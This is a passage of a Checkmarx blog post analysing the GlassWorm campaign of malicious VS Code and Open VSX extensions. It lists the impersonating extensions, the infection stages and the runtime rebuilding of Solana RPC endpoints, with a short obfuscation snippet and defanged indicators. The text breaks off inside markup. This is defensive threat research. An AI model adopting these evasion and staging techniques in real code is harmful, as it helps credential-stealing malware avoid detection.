{"id":107815,"date":"2026-03-23T15:00:00","date_gmt":"2026-03-23T13:00:00","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=107815"},"modified":"2026-04-01T16:48:24","modified_gmt":"2026-04-01T14:48:24","slug":"glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/glassworm-targets-developer-ides-again-hiding-staged-malware-behind-runtime-rebuilt-loaders\/","title":{"rendered":"GlassWorm Targets Developer IDEs Again, Hiding Staged Malware Behind Runtime-Rebuilt Loaders"},"content":{"rendered":"<style type=\"text\/css\">\n@import url(\"https:\/\/cmxiv.net\/cxzero\/cxzero-blog-styles-inject.extracted.css\");\n@import url(\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/styles\/vs2015.min.css\");\n<\/style>\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/highlight.min.js\" integrity=\"sha512-EBLzUL8XLl+va\/zAsmXwS7Z2B1F9HUHkZwyS\/VKwh3S7T\/U0nF4BaU29EP\/ZSf6zgiIxYAnKLu6bJ8dqpmX5uw==\" crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\"><\/script>\n<script>hljs.highlightAll();<\/script>\n\n\n\n\n<p class=\"print-source-info\"><script>\n    document.write(\"&copy;&nbsp;Checkmarx, all rights reserved. Retrieved \" + new Date().toLocaleDateString() + \" from<br\/>\" + window.location.href)<\/script>\n    <noscript>This document &copy;&nbsp;Checkmarx, all rights reserved.<\/noscript>\n<\/p>\n\n\n\n<p>The Checkmarx Zero team recently identified a new set of malicious extensions published to both the VS Code and Open VSX marketplaces, linked to the ongoing GlassWorm campaign we\u2019ve <a href=\"https:\/\/www.linkedin.com\/posts\/checkmarx-zero_glassworm-glassworm-vscode-activity-7394018172636618752-kxTL\/\">previously discussed<\/a> on social media.<\/p>\n\n\n\n<p>What makes this wave notable is the way the GlassWorm campaign continues to evolve while preserving the same core operating model. It\u2019s more than just malicious content in IDE extensions. Instead of compromising an already trusted publisher account, as seen in some earlier incidents, the operators behind this cluster mostly relied on impersonation and lookalike publishing. Several of the extensions mimicked well-known legitimate tools, while others mixed expected functionality with hidden malicious logic to appear credible to developers.<\/p>\n\n\n\n<p>Across all analyzed samples, despite differences in obfuscation and packaging, the malicious code ultimately converged on the same staged execution flow. The extensions rebuilt Solana RPC infrastructure at runtime, recovered next-stage payload locations from Solana memos, applied regional evasion checks, and dynamically executed additional payloads.<\/p>\n\n\n\n<p>This behavior closely aligns with previously reported GlassWorm activity. In fact, one of the VS Code samples still used invisible Unicode concealment and reused a Solana wallet address seen in earlier campaigns, providing a direct link to prior GlassWorm variants.<\/p>\n\n\n\n<p>In total, the 13 malicious extensions identified in this cluster accumulated almost 50k downloads. Although the samples used different runtime decoding chains, they all converged on the same underlying execution flow.<\/p>\n\n\n    <div class=\"section-zero-article light-theme\">\n        <div class=\"section-zero-article__wrapper\">\n            <div class=\"section-zero-article__nav-wrapper\">\n\t\t\t\t<div class=\"section-article-title\">Want important security news in your inbox, without marketing fluff?<\/div>\n                <button class=\"section-article-button\">Subscribe to Checkmarx Zero                    <img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/right_up_big.svg\" alt=\"right\">\n                <\/button>\n            <\/div>\n            <img decoding=\"async\" class=\"visual-image\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/visual-article.png\" alt=\"visual\">\n        <\/div>\n    <\/div>\n\t<!-- zero-subscribe-form-modal -->\n<div class=\"modal zero-subscribe-modal\" id=\"zero-subscribe-modal\">\n    <div class=\"modal__overlay modal__header-overlay\" tabindex=\"-1\">\n        <div class=\"modal__container\">\n            <header class=\"modal__header\" tabindex=\"2\">\n                <button class=\"modal__close-zero\" title=\"Close window\" aria-label=\"Close window\"><\/button>\n                <div class=\"section-subscribe\">\n                    <div class=\"section-subscribe__wrap-form\">\n                        <div class=\"section-subscribe__leftPart\">\n                            <div class=\"zero-modal-container\">\n                                <span class=\"zero-modal-container__title\">Never Miss Checkmarx <br> Zero Research Updates.<\/span>\n                                <span class=\"zero-modal-container__description\">Subscribe today!<\/span>\n                            <\/div>\n                            <img decoding=\"async\" class=\"zero-visual\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/cx_zero_subscribe_visual.webp\" alt=\"visual\">\n                        <\/div>\n                        <div class=\"section-subscribe__form hbsp-form form-with-multi-tags-select\">\n                            <script charset=\"utf-8\" type=\"text\/javascript\" src=\"\/\/js.hsforms.net\/forms\/embed\/v2.js\"><\/script>\n                            <script>\n                                hbspt.forms.create({\n                                    region: \"na1\",\n                                    portalId: \"146169\",\n                                    formId: \"fefb6730-994f-41bf-84ae-79460279a306\",\n                                    onFormReady: function ($form) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'none');\n\n\n                                    },\n                                    onFormSubmit: function ($form) {\n                                        document.querySelector('.zero-visual').style.display = 'none';\n                                        document.querySelector('.section-subscribe__leftPart').style.display = 'none';\n                                        document.querySelector('.form-description').style.display = 'none';\n                                        document.querySelector('.section-subscribe__form').style.margin = 0;\n                                        document.querySelector('.section-subscribe__form').style.padding = 0;\n                                        document.querySelector('.section-subscribe').style.minHeight = '132px';\n                                        document.querySelector('.section-subscribe__wrap-form').style.minHeight = '132px';\n                                        document.querySelector('.subscribe-zero-button__description-wrapper')\n                                            .classList\n                                            .add('subscribe-zero-button__description-hide');\n                                    }\n                                });\n                                document.addEventListener('change', (e) => {\n                                    if (e.target.closest('.hs-input')) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'block');\n                                    }\n\n                                })\n                            <\/script>\n                            <p class=\"form-description\">By submitting my information to Checkmarx, I hereby consent to the terms and conditions found in the <a href=\"\/legal\/privacy-policy\/\" target=\"_blank\">Checkmarx\u00a0Privacy\u00a0Policy<\/a> and to the processing of my personal data as described therein. By clicking submit above, you consent to allow Checkmarx to store and process the personal information submitted above to provide you the content requested.<\/p>\n                        <\/div>\n                    <\/div>\n                <\/div>\n            <\/header>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"Affected-extensions\">GlassWorm infected extensions list<\/h2>\n\n\n\n<p>The following GlassWorm-related extensions were identified as having this particular delivery mechanism:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody>\n<tr>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Extension<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Version<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Platform<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Downloads<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Release Date<\/strong><\/th>\n<th class=\"has-text-align-left\" data-align=\"left\"><strong>Impersonation<\/strong><\/th>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">pyscopexte.pyscope-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.1.403<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">4208<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 3, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">aligntool.extension-align-professional-tool<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.4.6<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">3168<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 5, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/chouzz\/vscode-better-align\">chouzz.vscode-better-align<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">rubyideext.ruby-ide-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.10.0-alpha.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1158<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 5, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">runnerpost.runner-your-code<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.13.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">4300<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 5, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/formulahendry\/code-runner\">formulahendry.code-runner<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">aadarkcode.one-dark-material<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">3.20.1<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">7768<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/zhuangtongfa\/material-theme\">zhuangtongfa.material-theme<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">lyu-wen-studio-web-han.better-formatter-vscode<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.1.6<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">10495<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/lyuwenhan\/code-formatter-and-minifier\">lyuwenhan.code-formatter-and-minifier<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">kwitch-studio.auto-run-command-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.6.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">7805<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/synedra\/auto-run-command\">synedra.auto-run-command<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">dopbop-studio.vscode-tailwindcss-extension-toolkit<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.14.29<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">5664<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 6, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/bradlc\/vscode-tailwindcss\">bradlc.vscode-tailwindcss<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">blockstoks.easily-gitignore-manage<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.10.2<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">938<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 9, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\"><a href=\"https:\/\/open-vsx.org\/extension\/codezombiech\/gitignore\">codezombiech.gitignore<\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">federicanc.dotenv-syntax-highlighting<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.0.3<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">2100<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 10, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">myexttool.my-command-palette-extension<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">0.0.4<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">320<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 12, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">pessa07tm.my-js-ts-auto-commands<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.0.4<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1824<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 12, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\">silvia68.console-log-generator<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">1.0.1<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Open VSX<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">254<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Mar 17, 2026<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">_______<\/td>\n<\/tr>\n<\/tbody><\/table><\/figure>\n\n\n\n<p>The above is a list of packages using this novel technique for infection and stealth, and <strong>not a comprehensive list of GlassWorm campaign packages<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Technical Analysis<\/h2>\n\n\n\n<p>GlassWorm is a self-propagating program that infects developer workstations using primarily Visual Studio Code extensions. A developer who installs an infected extension can expect credentials to things like cryptocurrency wallets, GitHub, and various package registries (like npm, PyPI, etc.) to be exfiltrated. The GlassWorm malware also attempts to establish a level of remote access for the attacker, allowing the attacker to use the developer\u2019s machine as a proxy for future attack activities.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\n<strong>Stage 0<\/strong> establishes the infection, installs and configures infrastructure for delivering the core payload, etc.<\/li>\n\n\n\n<li>\n<strong>Stage 1<\/strong> downloads the core payload from the internet, obfuscates its activity, harvests developer credentials, and prepares the infected machine for the final stage<\/li>\n\n\n\n<li>\n<strong>Stage 2<\/strong> exfiltrates recovered credentials and other sensitive data to the attacker, compromises browser data, and establishes a persistent access for future use by the attacker.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"Stage-0\">Stage 0<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Runtime-reconstruction-of-Solana-infrastructure\">Runtime reconstruction of Solana infrastructure<\/h3>\n\n\n\n<p>One problem malware often encounters in its goal to infect target machines is that defenders are eventually able to identify endpoints that the malware intended to use for exfiltration, and block scripts and executables that contain references to those endpoints.<\/p>\n\n\n\n<p>The first stage of the GlassWorm malware is designed to reduce early detection by dynamically reconstructing a list of <a href=\"https:\/\/solana.com\/docs\/references\/clusters\">Solana JSON-RPC<\/a> endpoints and using them to query on-chain transaction data instead of relying on hardcoded infrastructure. This allows the malware to interact with Solana nodes through the standard RPC interface while avoiding a static list of endpoints that defenders could more easily flag. Across the samples, this is done through layered obfuscation, such as rotated string arrays, wrapper lookup functions, and custom decoders. While the exact implementation differs from one extension to another, the result is the same: the malware reproduces a list of Solana RPC providers and uses them as attack infrastructure without triggering most kinds of early-detection tools:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_e5375b34135bd18858984debd67d0c2c\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_e5375b34135bd18858984debd67d0c2c\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">\/\/ resolves to:\r\n\/\/ https:\/\/api.mainnet-beta.solana.com\r\n\r\nfunction m(C, s, S, V) {\r\n  return A(C - 0x56, s - 0x47, s, C - -0xcc);\r\n}\r\n\r\nconst endpoint =\r\n  m(0x15, &#039;Opf5&#039;, -0x2d, 0x57) +\r\n  m(0x77, &#039;Ib0M&#039;, 0x76, 0x5b) +\r\n  &#039;beta.solan&#039; +\r\n  &#039;a.com&#039;;\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The full endpoint list resolves to multiple Solana RPC providers:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>https[:]\/\/api[.]mainnet-beta[.]solana[.]com<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana-mainnet[.]gateway[.]tatum[.]io<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/go[.]getblock[.]us\/86aac42ad4484f3c813079afc201451c<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana-rpc[.]publicnode[.]com<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/api[.]blockeden[.]xyz\/solana\/KeCh6p22EX5AeRHxMSmc<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]drpc[.]org<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]leorpc[.]com\/?api_key=FREE<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]api[.]onfinality[.]io\/public<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/solana[.]api[.]pocket[.]network\/<\/code><\/li>\n<\/ul>\n\n\n\n<p>The malware iterates through these providers using a fallback infrastructure pattern: if one endpoint is unreachable or returns an error, it catches the exception, pauses briefly, and tries the next provider in the list.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Solana address reconstruction and RPC query<\/h3>\n\n\n\n<p>Once the Solana RPC infrastructure is rebuilt, GlassWorm uses a hardcoded (but obfuscated) wallet address to request transaction metadata through JSON-RPC. The returned address is then queried to find transactions with memo data.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" 